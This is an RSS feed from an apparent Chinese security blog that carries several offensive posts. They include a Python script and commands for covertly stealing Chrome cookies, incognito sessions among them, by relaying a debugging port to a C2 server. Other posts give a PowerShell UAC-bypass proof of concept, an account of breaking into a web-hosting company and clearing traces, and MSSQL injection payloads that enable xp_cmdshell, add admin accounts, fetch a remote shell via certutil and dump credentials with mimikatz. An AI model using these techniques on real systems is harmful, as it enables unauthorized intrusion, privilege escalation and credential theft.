<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>渗透 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E6%B8%97%E9%80%8F/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Wed, 16 Sep 2020 14:19:30 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>无痕浏览器也许“并不能”保护你的隐私</title>
		<link>/web/1898.html</link>
		
		<dc:creator><![CDATA[s1ye]]></dc:creator>
		<pubDate>Wed, 16 Sep 2020 16:00:35 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[Chrome]]></category>
		<category><![CDATA[cookie]]></category>
		<category><![CDATA[取证]]></category>
		<category><![CDATA[浏览器]]></category>
		<category><![CDATA[渗透]]></category>
		<guid isPermaLink="false">/?p=1898</guid>

					<description><![CDATA[遇到的问题 在某些工作需求中，需要获取用户当前浏览器中的Cookies。由于目标比较严谨，使用了chrome浏览器的无痕模式，因此无法通过复制cookies文件解密的方式获取明文c...]]></description>
										<content:encoded><![CDATA[<h1>遇到的问题</h1>
<p>在某些工作需求中，需要获取用户当前<span class="wpcom_tag_link"><a href="/tags/%e6%b5%8f%e8%a7%88%e5%99%a8" title="浏览器" target="_blank">浏览器</a></span>中的Cookies。由于目标比较严谨，使用了chrome浏览器的无痕模式，因此无法通过复制<span class="wpcom_tag_link"><a href="/tags/cookie" title="cookie" target="_blank">cookie</a></span>s文件解密的方式获取明文cookie。</p>
<p>那么，隐私模式真的可以保护你的cookie了吗？</p>
<h1><span class="wpcom_tag_link"><a href="/tags/chrome" title="Chrome" target="_blank">Chrome</a></span>架构</h1>
<p>Chrome浏览器是多进程架构，有三种进程&#8211;浏览器、渲染器和插件。这也是为什么打开浏览器后默认就有6个进程的原因。<br />
<img src="/wp-content/uploads/2020/09/eece9eef-130e-c35f-4132-7948e225f6a2-1.png" alt="image.png" /></p>
<p>如果想详细了解架构可以参考下面提供的链接，简单来说就是Chrome会启动一个叫做“浏览器”的主进程，其余的“渲染器”进程就是每一个标签页。（这里简单理解一下，后面会利用到这个技术）<br />
<img src="/wp-content/uploads/2020/09/c0f4b392-5324-0219-3eca-9c294e0a8e8f-1.png" alt="image.png" /></p>
<h2>参考</h2>
<p>Google 图解这个系列文章挺好的建议读一读。<br />
<a class="wp-editor-md-post-content-link" href="https://toutiao.io/posts/uozd28/preview">Google 图解：Chrome 快是有原因的，科普浏览器架构</a><br />
<a class="wp-editor-md-post-content-link" href="https://patents.google.com/patent/CN102981903B/zh">一种多核浏览器中进程复用的方法及其多核浏览器</a></p>
<h1>方案一：remote debug</h1>
<p>chrome内核的浏览器支持远程调试，但是仅支持本地访问（localhost:9222）。通过<code>--remote-debugging-port=9222</code>参数指定端口启动chrome内核浏览器，即可通过localhost:9222页面同步其他浏览进程。</p>
<p>由于chrome内核的浏览器是多进程架构，只有一个浏览器主进程，其余的都是渲染器插件等进程，因此只要第一个启动的进程是通过remot debug方式启动，后面的一切新的标签都会被调试模式记录，重点是包括隐私窗口！</p>
<p><img src="/wp-content/uploads/2020/09/99c70ed2-c5d3-cc24-07bd-054fa2a9421e-1.png" alt="image.png" /><br />
<img src="/wp-content/uploads/2020/09/c0ca28ae-dcbc-6d0b-96f8-39a84d80df18-1.png" alt="image.png" /><br />
<img src="/wp-content/uploads/2020/09/2f6d7c1f-2702-1737-206b-c64617784bdc-1.png" alt="image.png" /><br />
自动化获取指定网站cookie<br />
<img src="/wp-content/uploads/2020/09/ecd32b75-9cc6-3200-4809-1a0f155c9d4b-1.png" alt="image.png" /><br />
简单说一下怎么利用，首先要通过你的远控kill掉所有的chrome进程，并通过命令行启动一个无窗口debug模式的浏览器。目标顶多会以为浏览器bug闪退，并且无弹窗不会引起怀疑。下面是一些用的到的命令。</p>
<pre><code class="language-bash line-numbers">$ wmic process where name="chrome.exe" get executablepath
获取chrome浏览器所在目录
$ taskkill /f /im chrome.exe &amp;&amp; chrome.exe --remote-debugging-port=xxxx --no-startup-window
kill掉所有chrome进程，并重新启动无窗口浏览器。利用命令一中获取的路径执行启动命令
$ frpc.exe
端口转发到外网，剩下的就是利用脚本读取指定网站cookie（换成自己c2的ip和端口）。python3 cookies.py localhost:9222
</code></pre>
<p>读cookies的脚本源码</p>
<pre><code class="language-python line-numbers">import websockets
import asyncio
import requests
import json
from sys import argv

async def getCookies(uri):
    data = {"id": 1, "method": "Network.getCookies"}
    command = json.dumps(data)
    async with websockets.connect(uri) as websocket:
        await websocket.send(command)
        res = await websocket.recv()
        print(f" {res}")

def getUri(url):
    rep = requests.get(url)
    dic = json.loads(rep.text)
    res = {}
    for i in range(len(dic)):
        title = dic[i]['title']
        wsuri = dic[i]['webSocketDebuggerUrl']
        res[str(i)] = wsuri
        print(str(i)+". "+title)
    return res

def main(uri):
    while 1:
        cmd = input("&gt; ")
        if cmd=="quit":
            break
        asyncio.get_event_loop().run_until_complete(getCookies(uri[cmd]))



if __name__ == '__main__':
    url = "http://"+argv[1]+"/json"
    uri = getUri(url)
    main(uri)

</code></pre>
<h2>参考</h2>
<p><a class="wp-editor-md-post-content-link" href="https://mango.pdf.zone/stealing-chrome-cookies-without-a-password">Stealing Chrome Cookies</a><br />
<a class="wp-editor-md-post-content-link" href="https://chromedevtools.github.io/devtools-protocol/">Chrome DevTools</a></p>
<h1>方案二：NetLog</h1>
<p>这个也是一个不错的方案，但是我并没有解决无窗口模式的问题，所以容易引起警觉，因此简单说聊一下，具体可以看参考文章。<br />
同样需要先k掉chrome进程，通过命令行指定参数 <code>--log-net-log="C:1.json"</code>，利用<a class="wp-editor-md-post-content-link" href="https://netlog-viewer.appspot.com/#import">NetLog Viewer</a>导入json，读取cookie。</p>
<h2>参考</h2>
<p><a class="wp-editor-md-post-content-link" href="https://yukaii.tw/blog/2019/03/02/chrome-netlog-and-netlog-viewer-hidden-header-credentials/">使用 Chrome NetLog 解析隱藏在 DevTools 中的 Header 資訊</a></p>
<h1>方案三：DLL注入HOOK</h1>
<p>同事也在研究的一个思路，同时某位表哥也给了我同样的思路。由于这部分的技术本人还很欠缺，因此不过多研究了。大致的思路是，HOOK某函数在浏览器https加密之前，获取明文cookie。希望后面可以填坑。</p>
<h1>适用性</h1>
<p>所有Chrome内核浏览器皆适用，比如最新的edge，360Chrome等等 : )。想测的话，可以自己测一下。</p>
<h1>最终</h1>
<p>感谢提供netlog和dll注入思路的表哥，虽然最后一种还在研究中，但学习到了很多。前两种方式也不过是临时方案，方案三才是长久之计。这篇文章只是聊一个思路，给和我同样在某些<span class="wpcom_tag_link"><a href="/tags/%e5%8f%96%e8%af%81" title="取证" target="_blank">取证</a></span>环节需要此方法的人，毕竟大部分同行的工作并不需要这么做。所以按需阅读，谢谢。最后，请遵守法律！</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Win10利用应用商店WSReset.exe进行bypassuac</title>
		<link>/tools/1714.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sat, 09 May 2020 07:11:32 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[uac]]></category>
		<category><![CDATA[win10]]></category>
		<category><![CDATA[内网]]></category>
		<category><![CDATA[渗透]]></category>
		<guid isPermaLink="false">/?p=1714</guid>

					<description><![CDATA[遇到了win10的环境就找了下bypassuac的。 环境 win10 1909 18363.535 Pro 复现 利用微软提供的sigcheck.exe签名检查工具发现 C:\W...]]></description>
										<content:encoded><![CDATA[<p>遇到了<span class="wpcom_tag_link"><a href="/tags/win10" title="win10" target="_blank">win10</a></span>的环境就找了下<span class="wpcom_tag_link"><a href="/tags/bypass" title="bypass" target="_blank">bypass</a></span><span class="wpcom_tag_link"><a href="/tags/uac" title="uac" target="_blank">uac</a></span>的。</p>
<h2>环境</h2>
<p>win10 1909 18363.535 Pro</p>
<h2>复现</h2>
<p>利用微软提供的<a class="wp-editor-md-post-content-link" href="https://docs.microsoft.com/en-us/sysinternals/downloads/sigcheck">sigcheck.exe</a>签名检查工具发现 <code>C:\Windows\System32\WSReset.exe</code> 存在<code>autoElevate</code>属性为<code>true</code></p>
<p><img src="https://y4er.com/img/uploads/20200509104541.png" alt="image.png" /></p>
<p>使用Procmon64.exe添加过滤条件</p>
<p><img src="https://y4er.com/img/uploads/20200509108734.png" alt="image.png" /></p>
<p>没找到 <code>HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command</code></p>
<p>根据<a class="wp-editor-md-post-content-link" href="https://docs.microsoft.com/en-us/windows/win32/sysinfo/hkey-classes-root-key">微软文档</a>可知用户特定的设置优先于默认设置，而当前用户可以写入这个值，那么可以使用powershell来实现poc。</p>
<pre><code class="language-powershell line-numbers">&lt;#
.SYNOPSIS
Fileless UAC Bypass by Abusing Shell API

Author: Hashim Jawad of ACTIVELabs

.PARAMETER Command
Specifies the command you would like to run in high integrity context.

.EXAMPLE
Invoke-WSResetBypass -Command "C:\Windows\System32\cmd.exe /c start cmd.exe"

This will effectivly start cmd.exe in high integrity context.

.NOTES
This UAC bypass has been tested on the following:
 - Windows 10 Version 1803 OS Build 17134.590
 - Windows 10 Version 1809 OS Build 17763.316
#&gt;

function Invoke-WSResetBypass {
      Param (
      [String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe"
      )

      $CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
      $filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
      New-Item $CommandPath -Force | Out-Null
      New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null
      Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null
      Write-Host "[+] Registry entry has been created successfully!"

      $Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden
      Write-Host "[+] Starting WSReset.exe"

      Write-Host "[+] Triggering payload.."
      Start-Sleep -Seconds 5

      if (Test-Path $filePath) {
      Remove-Item $filePath -Recurse -Force
      Write-Host "[+] Cleaning up registry entry"
      }
}
</code></pre>
<p>在我自己测试的过程中因为WSReset.exe启动过慢的情况出现了多次复现不成功，建议把powershell脚本去掉后面的清空注册表，避免WSReset运行时找不到注册表，不过记得手动清除。</p>
<p><img src="https://y4er.com/img/uploads/20200509105277.png" alt="image.png" /></p>
<h2>参考</h2>
<ol>
<li>https://www.activecyber.us/activelabs/windows-uac-bypass</li>
<li>https://github.com/sailay1996/UAC_Bypass_In_The_Wild</li>
</ol>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>看我如何拿下某建站公司</title>
		<link>/web/654.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sat, 06 Jul 2019 17:20:50 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[cs]]></category>
		<category><![CDATA[getshell]]></category>
		<category><![CDATA[实战]]></category>
		<category><![CDATA[提权]]></category>
		<category><![CDATA[渗透]]></category>
		<guid isPermaLink="false">/?p=654</guid>

					<description><![CDATA[文章首发于T00LS,未经允许禁止转载 前言 记录某建站公司沦陷的过程。内容简单较为简单，欢迎各位表哥交流指导。 getshell 目标是某建站公司，大致看了一下伪静态，没什么直接...]]></description>
										<content:encoded><![CDATA[<blockquote>
<p class="md-end-block md-p md-focus"><span class="md-plain md-expand">文章首发于</span><span class=" md-link"><a spellcheck="false" href="https://www.t00ls.net/articles-50574.html" target="_blank" rel="nofollow noopener noreferrer"><span class="md-plain">T00LS</span></a></span><span class="md-plain md-expand">,未经允许禁止转载</span></p>
</blockquote>
<h2 class="md-end-block md-heading" contenteditable="true"><span class="md-plain">前言</span></h2>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">记录某建站公司沦陷的过程。内容简单较为简单，欢迎各位表哥交流指导。</span></p>
<h2 class="md-end-block md-heading" contenteditable="true"><span class="md-plain"><a class="tag_link" title="浏览关于“getshell”的文章" href="/tags/getshell" target="_blank" rel="noopener noreferrer">getshell</a></span></h2>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">目标是某建站公司，大致看了一下伪静态，没什么直接撸的欲望，一边扫着端口的同时，一边测了几个案例网站。 </span><span class="md-plain">好在没让我失望，注入一枚</span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49af438ca7.png"><img src="https://i.loli.net/2019/04/03/5ca49af438ca7.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">这个时候端口也扫完了，有两个端口引起了我的注意，999和6588。分别是phpmyadmin和护卫神。</span> <span class="md-plain">尝试了一下弱口令都无果，整理了一下收集到的信息，以及可利用的点。</span> <span class="md-plain">案例站大部分与建站公司的网站在同一个服务器上，服务器为 iis7.5,windows2008（存在解析漏洞）</span> <span class="md-plain">此时有几种方式<span class="wpcom_tag_link"><a href="/tags/getshell" title="getshell" target="_blank">getshell</a></span>： </span><span class="md-plain">1.直接注入into outfile</span> <span class="md-plain">2.前台随便找一个上传点传一个包含一句话的图片</span> <span class="md-plain">3.注入案例站读取管理员密码后台上传</span> <span class="md-plain">4.挖其他漏洞如：远程文件包含等可直接getshell漏洞</span> <span class="md-plain">第一二条都失败了，案例站的数据库用户没有读写权限，前台无上传点，由于第四条相对于来说需要另外的时间去挖并且远程包含这种基本没戏，所以最终只能后台getshell了。</span><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49ae16235c.png"><img src="https://i.loli.net/2019/04/03/5ca49ae16235c.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span><span class="md-plain">执行命令发现无法执行，应该是权限不够？</span><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49b2ac4594.png"><img src="https://i.loli.net/2019/04/03/5ca49b2ac4594.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span><span class="md-plain">上传了aspx大马，访问500，心态炸裂。</span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49b3e3e988.png"><img src="https://i.loli.net/2019/04/03/5ca49b3e3e988.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain"><a class="tag_link" title="浏览关于“提权”的文章" href="/tags/%e6%8f%90%e6%9d%83" target="_blank" rel="noopener noreferrer">提权</a>思路：</span> <span class="md-plain">1.phpmyadmin直接udf<span class="wpcom_tag_link"><a href="/tags/%e6%8f%90%e6%9d%83" title="提权" target="_blank">提权</a></span>（无权限读写）</span> <span class="md-plain">2.登录护卫神，和流光表哥@赢时胜流光同样的方法 </span><span class="md-plain">3.搞一个可以解析aspx，权限高一点的网站？等 </span><span class="md-plain">最后利用2，3结合搞定。</span></p>
<h2 class="md-end-block md-heading" contenteditable="true"><span class="md-plain">登录护卫神后台+提权</span></h2>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">护卫神的漏洞利用条件是可以上传可执行脚本，来读取本地登录护卫神的cookie。shell已经拿到了，直接上传脚本读取cookie。</span><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49b5c6e48d.png"><img src="https://i.loli.net/2019/04/03/5ca49b5c6e48d.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span><span class="md-plain">f12 document.cookie 刷新:</span><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49b7f16533.png"><img src="https://i.loli.net/2019/04/03/5ca49b7f16533.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49b85468da.png"><img src="https://i.loli.net/2019/04/03/5ca49b85468da.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">这个护卫神是3.7版本的，没有找到上传点，但是不慌，有ftp账号密码，并且找到了支持asp,aspx的网站，直接上大马。</span><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49bd9de608.png"><img src="https://i.loli.net/2019/04/03/5ca49bd9de608.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span><span class="md-plain">可以执行命令，补丁打了倒是不少，查了一下可以利用的exp，用论坛里的几个免杀的烂土豆exp都失败了，webshell版的也报错。</span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49bec85116.png"><img src="https://i.loli.net/2019/04/03/5ca49bec85116.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">最后弹到<a class="tag_link" title="浏览关于“cs”的文章" href="/tags/cs" target="_blank" rel="noopener noreferrer">cs</a>上，随手试了一下<span class="wpcom_tag_link"><a href="/tags/cs" title="cs" target="_blank">cs</a></span>自带的提权exp ，ms14那个，尼玛成了。</span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49c130660f.png"><img src="https://i.loli.net/2019/04/03/5ca49c130660f.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">tasklist /svc查看一下远程端口，由于是外网，直接登录。</span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49c3850489.png"><img src="https://i.loli.net/2019/04/03/5ca49c3850489.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">读了管理员的密码，清理痕迹溜了。（密码是随机的十二位大小写加特殊字符，这谁顶得住啊） </span></p>
<h2 class="md-end-block md-heading" contenteditable="true"><span class="md-plain">总结</span></h2>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">水文，每次搞完回头再看的时候都觉得没什么技术含量，的确也是没有什么骚操作，总结一下这次<a class="tag_link" title="浏览关于“渗透”的文章" href="/tags/%e6%b8%97%e9%80%8f" target="_blank" rel="noopener noreferrer">渗透</a>，只有这个读取cookie的php脚本，我学到了，嘻嘻嘻，溜溜球~</span></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>【Hello_C】一次费劲的注入到提权</title>
		<link>/web/592.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 21 Oct 2018 11:55:14 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[实战]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[渗透]]></category>
		<guid isPermaLink="false">/?p=592</guid>

					<description><![CDATA[一次偶然发现了一处注入，apsx注入，之前练得少，决定试一试看看，先sqlmap跑一波 500报错，可能跑不出来，于是试试手工，sqlmap被拦了，但是手工很顺利，可能是加了sql...]]></description>
										<content:encoded><![CDATA[<p>一次偶然发现了一处<span class="wpcom_tag_link"><a href="/tags/%e6%b3%a8%e5%85%a5" title="注入" target="_blank">注入</a></span>，apsx注入，之前练得少，决定试一试看看，先sqlmap跑一波</p>
<p><a href="https://img.chabug.org/img/20181021194327.png"><img loading="lazy" class="aligncenter size-medium" src="https://img.chabug.org/img/20181021194327.png" width="435" height="276" /></a><a href="https://img.chabug.org/img/20181021194419.png"><img loading="lazy" class="aligncenter size-medium" src="https://img.chabug.org/img/20181021194419.png" width="554" height="134" /></a></p>
<p>500报错，可能跑不出来，于是试试手工，sqlmap被拦了，但是手工很顺利，可能是加了sqlmap的指纹了吧；</p>
<p><a href="https://img.chabug.org/img/20181021194543.png"><img loading="lazy" class="aligncenter size-medium" src="https://img.chabug.org/img/20181021194543.png" width="554" height="120" /></a><a href="https://img.chabug.org/img/20181021194543.png">https://img.chabug.org/img/20181021194543.png</a></p>
<p>判断版本&#8217; or @@version&gt;0 &#8212;</p>
<p><a href="https://img.chabug.org/img/20181021194626.png"><img loading="lazy" class="aligncenter size-medium" src="https://img.chabug.org/img/20181021194626.png" width="554" height="139" /></a></p>
<p>计算机名 &#8216; or @@SERVERNAME&gt;0 &#8212;</p>
<p>爆当前数据库名 &#8216; or db_name()&gt;0 &#8212;</p>
<p>&nbsp;</p>
<p>网站没有找见后台，想着跑出来密码也没有登录地方，于是那些查找数据库、表名、字段名就直接略过，跑出来也登不进去。</p>
<p>先看看其他网站，于是先跑一下二级域名以及旁站，bing查询确实很棒，可以查出好多旁站，极力推荐；</p>
<p>发现三处旁站，一个php的、一个oa还有一个致远协同，没有可以利用的地方，还是先看看注入吧；</p>
<p>先看注入, 当前用户  &#8216; or user_name()&gt;0 &#8212;</p>
<p><a href="https://img.chabug.org/img/20181021194846.png"><img loading="lazy" class="aligncenter size-medium" src="https://img.chabug.org/img/20181021194846.png" width="508" height="121" /></a></p>
<p>判断是否支持多句查询</p>
<pre class="lang:default decode:true ">’;declare @s int;--</pre>
<p>&nbsp;</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg36kpugwj30cp03vaa4.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg36kpugwj30cp03vaa4.jpg" width="457" height="139" /></a></p>
<p>查看一下xp_cmdshell是否开启</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg36v5hssj30ez02ot9j.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg36v5hssj30ez02ot9j.jpg" width="539" height="96" /></a></p>
<p>首先开启一下xp_cmdshell</p>
<pre class="lang:default decode:true ">';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--</pre>
<p>&nbsp;</p>
<p>显示登录成功，则是命令执行成功，成功开启xp_cmdshell，然后可以执行命令了，但是执行命令没有回显，正常现象；</p>
<p>直接添加用户，显示执行成功，但是没有用户添加上，郁闷，之后才发现是火绒的问题。</p>
<pre class="lang:default decode:true ">';exec master..xp_cmdshell 'net user web$ Web123!@# /add';--

';exec master..xp_cmdshell 'net localgroup administrators web$ /add';--

执行cmd回显：

';create table temp(id int identity(1,1),a varchar(8000));--   创建一个表

';insert into temp exec master.dbo.xp_cmdshell 'whoami'; --   执行cmd指令并且插入到表中

' and (select substring((select a from temp for xml auto),1,8000))&gt;0;-- 可以一次得到所有的结果

';drop table temp;--  删除表</pre>
<p>&nbsp;</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg37e019zj30dl065jud.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg37e019zj30dl065jud.jpg" width="489" height="221" /></a><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg37li1fij30fe071jv1.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg37li1fij30fe071jv1.jpg" width="554" height="253" /></a></p>
<p>目标显示开启了1433,3389,3306端口，于是可以添加sa用户然后远程连接，增加sa用户：</p>
<pre class="lang:default decode:true ">';exec master.dbo.sp_addlogin test,password;--

';exec master.dbo.sp_addsrvrolemember test,sysadmin;--</pre>
<p>&nbsp;</p>
<p>可以直接连接，方便好多，比刚才执行命令舒服了好多；</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg37vhym9j30c007uabs.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg37vhym9j30c007uabs.jpg" width="432" height="282" /></a></p>
<p>完美，可以直接执行命令，美滋滋。CS或者Msf直接撸之，但是没有vps就很心疼啊，只能找个shell远程下载了。</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>发现旁站php的配置文件，然后还有phpmyadmin，这里有几个思路拿shell:</p>
<ul>
<li>直接远程下载到web路径；</li>
<li>旁站phpmyadmin后台拿shell;</li>
<li>旁站登录后台拿shell;</li>
</ul>
<p>&nbsp;</p>
<p>第一个：</p>
<p>直接下载，然后，或者直接下载wce或者procdump.exe直接读取管理员密码然后登录，美滋滋。</p>
<pre class="lang:default decode:true ">certutil.exe -urlcache -split -f http://xxx/uploads/conf1g.txt conf1g.php

move conf1g.php  E:\xxxxx\   失败</pre>
<p>&nbsp;</p>
<p>直接500报错，看来是有waf，难怪slamp一直跑不出来，直接换个过狗的吧</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg3852a4sj30fe04r0t4.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg3852a4sj30fe04r0t4.jpg" width="554" height="171" /></a></p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg38h3ebyj30fe03nt9u.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg38h3ebyj30fe03nt9u.jpg" width="554" height="131" /></a></p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg38r20ysj30fe04r0ti.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg38r20ysj30fe04r0ti.jpg" width="554" height="171" /></a></p>
<p>&nbsp;</p>
<p>第二个:</p>
<p>phpmyadmin后台登录几种建表方式没有成功，然后日志写shell也没有成功</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg390iqznj30fe05vjs8.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg390iqznj30fe05vjs8.jpg" width="554" height="211" /></a></p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg3980ffnj30dt02zjs0.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg3980ffnj30dt02zjs0.jpg" width="497" height="107" /></a></p>
<p>第三种</p>
<p>php站进入后台拿shell，密码还没有解开，暂时无法登录拿shell</p>
<p>&nbsp;</p>
<p>最近发布的冰蝎管理shell，免杀还是不错的，大马带小马，可以简单操作了</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg39granlj30ed03egm8.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg39granlj30ed03egm8.jpg" width="517" height="122" /></a></p>
<p>抓hash</p>
<p>wce  失败</p>
<p>Procdump导出，使用mimikatz</p>
<pre class="lang:default decode:true ">mimikatz# sekurlsa::minidump lsass.dmp

mimikatz# sekurlsa::logonPasswords full</pre>
<p>&nbsp;</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg39pnfgoj309s066gmg.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg39pnfgoj309s066gmg.jpg" width="352" height="222" /></a></p>
<p>成功拿到密码登录</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg39z8bokj30fe07fmz5.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg39z8bokj30fe07fmz5.jpg" width="554" height="267" /></a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>记通达OA2015变量覆盖和getshell</title>
		<link>/web/515.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Thu, 09 Aug 2018 05:17:58 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[getshell]]></category>
		<category><![CDATA[OA]]></category>
		<category><![CDATA[变量覆盖]]></category>
		<category><![CDATA[渗透]]></category>
		<category><![CDATA[漏洞]]></category>
		<guid isPermaLink="false">/?p=515</guid>

					<description><![CDATA[漏洞详情：http://www.anquan.us/static/bugs/wooyun-2016-0168661.html 团队一起日站的时候发现了一个oa，然后就一顿乌云找到了...]]></description>
										<content:encoded><![CDATA[<p><span class="wpcom_tag_link"><a href="/tags/%e6%bc%8f%e6%b4%9e" title="漏洞" target="_blank">漏洞</a></span>详情：<a href="http://www.anquan.us/static/bugs/wooyun-2016-0168661.html" target="_blank" rel="noopener noreferrer">http://www.anquan.us/static/bugs/wooyun-2016-0168661.html</a></p>
<p>团队一起日站的时候发现了一个oa，然后就一顿乌云找到了这个，成功<span class="wpcom_tag_link"><a href="/tags/getshell" title="getshell" target="_blank">getshell</a></span>。</p>
<h1><span class="wpcom_tag_link"><a href="/tags/%e5%8f%98%e9%87%8f%e8%a6%86%e7%9b%96" title="变量覆盖" target="_blank">变量覆盖</a></span></h1>
<p>登录构造请求数据包</p>
<pre class="lang:default decode:true ">POST /logincheck.php HTTP/1.1
Host: xx.xx.com
Content-Length: 182
Cache-Control: max-age=0
Origin: http://xx.xx.com/
Upgrade-Insecure-Requests: 1
